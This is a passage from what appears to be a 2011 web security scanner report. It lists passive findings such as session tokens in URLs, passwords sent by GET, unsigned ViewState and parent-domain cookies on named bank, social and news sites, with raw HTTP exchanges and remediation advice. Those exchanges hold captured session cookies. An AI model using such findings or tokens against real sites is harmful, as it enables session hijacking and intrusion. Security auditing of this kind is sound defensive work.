<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<link href='http://www.arbornetworks.com/components/com_securityimages/securityimages.css' rel='stylesheet' type='text/css'/><img src='http://www.arbornetworks.com/components/com_securityimages/plugins/core/1.1/imageGenerator.php?refid=c90ab5512d38a70929ae7fc2a99f3c2d34fa1e75&amp;size=&amp;sessionid=bcc07bd00e8de905ed6e6f0d69bfca86' title='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' alt='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' id='PFSecurity' name='PFSecurity' border='0'><a href="javascript:SecurityImagesNew('PFSecurity','PFSecurity_try', 'PFSecurity_reload');" id='askNewPicture' title='Ask a new picture' alt='Ask a new picture'>
...[SNIP]...

7.5. https://www.bankofamerica.com/credit-cards/cardoverview.action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /credit-cards/cardoverview.action

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /credit-cards/cardoverview.action?context_id=overview_page HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:05 GMT
Content-type: text/html;charset=UTF-8
Set-Cookie: SMIDENTITY=uFfMEsd7D1Lzo3uqimBfPe6op0seYSw5FK0N2o2LSxuimtvA9qSCsJAvfeVsPvfCWm1zCN/uHtX/g6LYcixKdLOKiLVP/EYf8dA14vp/dukuVOIrGFEbLkEFNF+0TLF6cYbOrrRBQH2t4Kmg5r2AnGUxzO0ki0iL6zng6vOMz0BtJl+0iIVjW620dEs/h7MMW250NuhjvXThzgHOs+7T+SR6snV4cG0n/HE3DGvEfAwpMEGUnaF/vwOwK++AtNI08tRrefbmgZ37udknlk3NSTCsYSZhG47QS4M+SvY3qEnTfGrI4HFjsHl9ML18LpD+zUiCFRiJSenoooUDbLRX3MCFk3oHhGZrZ6XKTlbF8rkVoQEHaYzK6d2qOMDfWuSblZnIR3ay5o9P/W+QMTpH1RzCg+lbcu6QIUk99uonbsLmVZEC4t+bwq63q+3AXzmBmczAGibqlDK1nuSfk6ohbJ7gDSYPWFXG17jhdExIdGZGQmjYZ8FseepQUkKfbSNi; path=/; domain=.bankofamerica.com; secure
Content-language: en-US
Set-cookie: JSESSIONID=0000B59GHdMjavO4FAl3W7puTJ1:12qb4k2ev; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="EN">
   <head>
       <link href="/www/en_US/stylesheet/cardsearch/creditcards_style.css" type="text/css"
   rel="styles
...[SNIP]...
<noscript>
   <iframe src="https://sitekey.bankofamerica.com/sas/sitekeyWidgetScript.do?nojs=true&gcsl_token=9DC0A8B40B2030BE48CC994ACF8E7234475C763CB0C2A4F191F4C97FD66B68EE19AEC9325C6F8FCC5939B4CDAB696AFB69A14A76564F1A40255AB19F86B2DE1201B1EE60F06948E2097D4B6A0981A4ADF9FC42DDD580648D62B7C090A04CF9AC0840BC56A49B34829D6F702D60621995D0986513A1725428C06D24B2D27D0695CD384A0B7E1BC13150951892426D5A0586E1F4FFB5D5CD067B06BAFF1230F72A8839AA873AEDAE0EAC428D8A652AAF6F5DDE41B604D665FF8BA4CCF25EF117A12235C926176BE99148B33E2A8967433555276CB2456D773FF605C314B530ACA1829A8FA4DA1D12F9DCC54A6E61D2B1D0B9949C14905B857A2BC59ED235AF21FA6AB0B8F226802E0BECDE085B6F05BA84BFA6EDE859A8FF833AA0422D126B2C9015969A26A701DE736815CA4FE18EF8695D4AD62CA1FB00351D475299E4B8CA2D4729A070C2B32EBDFA95EB3A4F3D7E8B300F5D0B27894A8F7F8F52228D44445B95AEB43BD507E19944846A59DA63CAA681D96BBA30317E0F21DD7B5E7D28A80233251AB435FFE3779FC6B890A60896B9995D1D3DC3537C3B2B213191FCF6E15A896FA08206EC9DE6ADAE5A55958A4806DC507E31669EB6E9E47B514FA799B525A80BBAD040AE500A8B676E93BAA01EF627F49A6154719FCD228B2B67680BBCF313D5A8A8C537B20714FD383E5051F608D05CC4B5A46E232C9DBAEDC73385556B9DF76C412400AC7058B8223B3195F2A2CB5C7E83475296F60111E9216E22E1D0825911C9E6A25236F292B312F5B7C5A64D1FDDA95C951E325790DD82AAA80B86CD6C7DE60CD46EB9BA8EE18B0818F73F0B8C925563E7D8771A1E7456BCD2F6EE32A04A75819B291C9BD97C9915D4098BF61A68E49E2229F4D9E8BE028DE068661C039678B5BA5965F776B5C4BB6799A087A1DD58FB5A6CDF&source=BOFA-CAP&gcsl_iv=F96D3BF5877F7949" height="200" width="250" frameborder=0 scrolling=no>
   </iframe>
...[SNIP]...

7.6. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=167973672925&app_id=167973672925&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df21adff66%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff27f92d41%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df39f794cc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df26ddcbf2c%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff27f92d41%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39f794cc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df2efeea34c%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff27f92d41%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39f794cc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df286962918%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff27f92d41%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39f794cc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php#cb=f2efeea34c&origin=http%3A%2F%2Fcommunity.invisionpower.com%2Ff27f92d41&relation=parent&transport=postmessage&frame=f39f794cc
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 22:25:44 GMT
Content-Length: 0


7.7. http://www.kansascity.com/2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.kansascity.com
Path:   /2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html HTTP/1.1
Host: www.kansascity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 01:13:01 GMT
ETag: "1e3db5c-e2bf-4d4a011d"
Accept-Ranges: bytes
Content-Length: 58047
Content-Type: text/html
Expires: Thu, 03 Feb 2011 01:16:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 01:16:50 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">



...[SNIP]...
<li><a href="http://www.kansascity.com/placead/?catid=784&amp;-session=ComboAd:3F4CE782%0A032091B4EFpyUGD8BCA5">Sell A Car</a>
...[SNIP]...
<li><a href="http://www.cars.com/go/dealersearch/specials.jsp;jsessionid=YKUYUUH4MLJIXLAYIETE2UY?specialsURL=http%3A%2F%2Fcars.adperfect.com%2Findex%2Faffiliate%2Findex.html%3Fapn%3Dkansascity&amp;apn=kansascity&amp;aff=kansascity">Used Car Specials</a>
...[SNIP]...
<li><a href="http://www.cars.com/go/dealersearch/specials.jsp;jsessionid=YKUYUUH4MLJIXLAYIETE2UY?specialsURL=http%3A%2F%2Fcars.adperfect.com%2Findex%2Faffiliate%2Findex.new.html%3Fapn%3Dkansascity&amp;apn=kansascity&amp;aff=kansascity">New Car Specials</a>
...[SNIP]...
<li><a href="http://www.kansascity.com/placead/?catid=779&amp;-session=ComboAd:3F4CE7%0A82032091B273HPYGD7BB43">Sell A Home</a>
...[SNIP]...

7.8. http://www.lokeshdhakar.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.lokeshdhakar.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.lokeshdhakar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:01 GMT
Server: Apache
X-Pingback: http://www.lokeshdhakar.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 37290
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>

<meta charset="utf-8" />

<title> Lokesh Dhakar</title>

<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="style
...[SNIP]...
<img src="http://www.lokeshdhakar.com/wp-content/uploads/2009/03/me_bradleys_bday.jpg" alt="Lokesh Dhakar at Bradley's Bday Party" class="diagram-alt" />
My schedule at <a href="http://my.sxsw.com/events/my_schedule_feed.rss?id=17709&#038;syndication_token=1e43b80060f090dc8e7f3fb0eb9eb645">My.SXSW rss</a>
...[SNIP]...

8. Password field submitted using GET method  previous  next
There are 3 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


8.1. http://fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:54:33 GMT
Connection: close
Content-Length: 83533
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<!-- LOGIN -->
   <form name="member_login">
       
           <tr>
...[SNIP]...
<td>
                                           <input style="font-size: 9px; font-family: verdana; height: 15px" onFocus="this.select()" type="password" size="8" name="password" onkeyPress="checkEnter(event)">
                                       </td>
...[SNIP]...

8.2. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.boston.com
Path:   /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1
Host: www.boston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:30 GMT
Server: Apache/2.2.13 (Unix)
Set-Cookie: pathCnt=1; path=/; domain=.boston.com
Accept-Ranges: bytes
Served-By: rebecca
Content-Type: text/html
Connection: close
Set-Cookie: bcpage=0;expires=Fri, 08-Jan-2016 01:06:30 GMT;path=/;domain=boston.com;
Content-Length: 40252

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!-- Need for HL -->
<script language="JavaScript"><!--

var trustedT
...[SNIP]...
</div>
<form id="lgForm" onsubmit="return false">
<table cellspacing="0" style="margin: 5px; width: 98%;height:200px" id="logtable">
...[SNIP]...
<td><input type="password" style="" maxlength="50" name="pass" id="pass" /></td>
...[SNIP]...

8.3. http://www.fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:54 GMT
Connection: close
Content-Length: 83551
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<!-- LOGIN -->
   <form name="member_login">
       
           <tr>
...[SNIP]...
<td>
                                           <input style="font-size: 9px; font-family: verdana; height: 15px" onFocus="this.select()" type="password" size="8" name="password" onkeyPress="checkEnter(event)">
                                       </td>
...[SNIP]...

9. ASP.NET ViewState without MAC enabled  previous  next
There are 4 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


9.1. http://www.merrilledge.com/m/pages/self-directed-investing.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/self-directed-investing.aspx

Request

GET /m/pages/self-directed-investing.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=8DVPG6bhLhltEG1FjhrgafC0CcuM/mzhZg+ZO4Fn4N7V8Ap55lrmyz9HWpZ+FVMYcuGvGsLs+F8fomu+ZqybyYrEqEFhdL+uE42cL4uzTOojaJYo1xb91lRcgZUAJzx6CG+Xvv8KLTkamtoYiMO0tXoyB5SnItLVDSCnSA7T6+JH6sF9+tCBdKyH8JAxP7JQXa7Gbyn7VfXyPbdn2MQ5YjS4TDtJiHPV2n3kwEIzWscBtsEdkM6B3v1AJFdcl961XkKl4NRv+R1cnaz0OJDIgtBgBOIAH33VI4JPEq6R5KFdMBd9oeCkaZdSV/RUibkCgyKsOopPRnBjAR1ucPhGAHIGXmpmJNjH9+p+u3tPYW+y7+fq/z+YtIQ9lLGo9PuXxLw4yf2ryu0xsfnN/cX0Rv5hKpnfqHXTiFNLdooF4fwFhVRPHVGcsX4+v9NJKw1e2k91+AU0eZaak/U3SNwC2zplr+xrLUnCiOnmv5aWpBA2QRFH4sqmlb7tOVHg76fm4QmkzCNoA0wieztn3baqZD/I86Hadaelj/nZ2rgCYs8h7uYmxIEzU6VGZ7ZCF2NoBYFeb4eIZlqZ/+or03iZf/6o5LLOb37KbV8wy0Exz8cy8AP6iADkE4FsuKEzScKb; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=8ddb7e626e0c4eac90fb5dc54d017916; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99467


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE3MTA3ODkwMDNkZA==" />
...[SNIP]...

9.2. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/zero-dollar-trades.aspx

Request

GET /m/pages/zero-dollar-trades.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=9sTztPG9LIpTqCRqm5C/4EacAM+v7Pe04GMW3r5atCVT71fZQlEkwugZOjyBvesjG5IMK7yC4z+rzi52Y2Rwfzioa6Te7w2siYkFLhTMBHilWY4Q6yBX7NgBAxU1BK1JRv0vK2haKUjfkBFQ4hSjXxU9DS2ElZwfKBDrfdwYRG/DfEkCZMfk7kOOv3/RCE7cXyczgqEb3jGq+lq14GXRid9xAckqjAw8nQQDb9QtElhfHjwQ13IMhVRuoNSl34XxSizadDPOfV5ROZ9ptH3YDolLXCkbRu+2t6/lBdbbpFWsJfJ7DclHs5472SkUIqFunvN7HfcOWkpUEeNtSZ86pP6LYe5ksGeClXhKqiGCumb0CdjphGaPavyyAa243o79JwOyKse04wKOloP6arxbLtLk8Av0o1NQ83V+rPNWmGvpKCtw6q5AOnDFr0JExL5pwuLMU8GXOq6LvQgdydKKEwi+kzu5A1cR6YW039SrUi8/P+OwrPBM58oY2ykRFCUTfS/jIs7yDuiPlaUSz7jJgCcALG0fDiV5utWLvZc+vNv6B+ra0Q3k7FFXg0vIFIJeSnPCAFTMbKDD5mSYSR/gvNgzHO5QN5BLiw3cG1uC2DYUEcY+zcFJ4hObnWi8iqYb; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=fc00ac76623c478fade3bfb4e83564ed; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 91816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTE5MjgyMzgyNWRk" />
...[SNIP]...

9.3. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=+3nYGeeE+NPdhSQG3vh+HTqhnIVv2HDbcYHGjp54fTB2eN8gWiB5w9oZxieXINxyqp5JOkWFYpxYSlEUp+s/Q7dr/qI2dW4+Ugpj9Ak4HneKuqAmlrb9+b1lkfb5z1x01mFDUVUSIPYlzqUceh73FNi2dPFIGUKgIrS5YIX0VBG3Kvli+WXEUzA7MvB4u5+Py7hXzFl2ORnsgVAu/Q1zWhLJKMtsBGrF/kIITSL0QaUJLsFt1mJRkosThEinabeRLDNi7M3YfO8wlKzm7S/B4D7p2u5Ayo2RQLBc18md65QkSsQY684a0I+0n4l2tFejlKie8oTEEzEd1h4/38tbkAQPmqC7kZDPfpNiMp3x7g7+sQ9iY5IsI0nIEkrpqitpkAvfVRHp/q7rPO7Eb1rSSTXtThYXqMEQsxKQIVS0AC82nDR2hbKY7xCDjqXsAEHo8nuo3VN2ebUSNpzuny4qEnUzC7b+k3WQKNy5wsp07CNxBAJQojRx5NQNw1xQyJfaQ6R8CsLqvuK9to/Ypp9xRkRlF27tPV9g2nrXGMcvOFz5HQIJqD5zfSuYF1SPhTc5tj8W5U6dRGuwHkHGPzos1a1H98yr4g+RpcHn8DNPXR1oSvecaDlW11MMEwLXbB4Q; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=6e232d9b30534bdfa9d614bf9ec5848f; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTU5ODkwMTk0M2Rk" />
...[SNIP]...

9.4. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Request

GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=KDC8DK5B+KFv3Wz0S4K2LXSI4NgojmEdX2lulfZHWNW5jh+8BzJJh8KHjWLs1JqTo+0StslhsZtq4lyyEMIl0GAzy4I5jHURcU1INosJRPZPUqnycZXXkgvlWX/bMnXF1SioazWzlZBumjo782mfcGOSGzZ6T2j52k8DJwFasAcEq6ZcsHEQxgNk+ah8BOdvTcviU2WAGv0G+CeQus7N0onu+TGDhQ0W39ik0Cg9UB3KRVXs2KbKjqellsaunYWAIq1kwbkhHpHXGKLQUsg3glJkNpgNxmSQiWiC4o+mK7ggegysuL3PcK5zTI1Iw9XexI9N8wLqYLNQUz/0jdrKZmkQ0Ip2Zm1FhMKWvXjkVhktzIcKIr/IcMNQa8XEdZ7JERXHmTOamI52E0ET2IBtTGVVEeUOdGrvQiyegTguDsbQD4MSTWmYQ7ZXGSyXgruiBshchcGbOLHIKS6SvFT7pgjTnLK9JScdNdpYCvCG9cjkUtFjpNOSVxi1bKz5Xu8TO49YSSs9iFmlCix8Q1nG2I+rzTBtxIyWVW1GT9AoeRDYu5HzhJKISmwaX2qvWrTBe014K56+FA4eWCo9BOF9XQlpxTB1WpVbsoxwa3Rg7LNsq9S1GpNb8XRTJtfcmDvw; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx
Set-Cookie: pxs=671d45371feb47b7b0d445f52cd92025; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 101016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzcxNjA1NzU5ZGQ=" />
...[SNIP]...

10. Cookie scoped to parent domain  previous  next
There are 213 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. https://chaseonline.chase.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://chaseonline.chase.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 17909
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=363a4a0a-9240-4195-9a73-ca0f1962dd7b; domain=.chase.com; path=/
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:02:00 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta http-equiv="Pragma" content="no-cache"/
...[SNIP]...

10.2. http://food.change.org/blog/view/bluefin_brigade_to_the_rescue  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://food.change.org
Path:   /blog/view/bluefin_brigade_to_the_rescue

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/view/bluefin_brigade_to_the_rescue HTTP/1.1
Host: food.change.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=utf-8
Connection: close
Status: 301
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 5
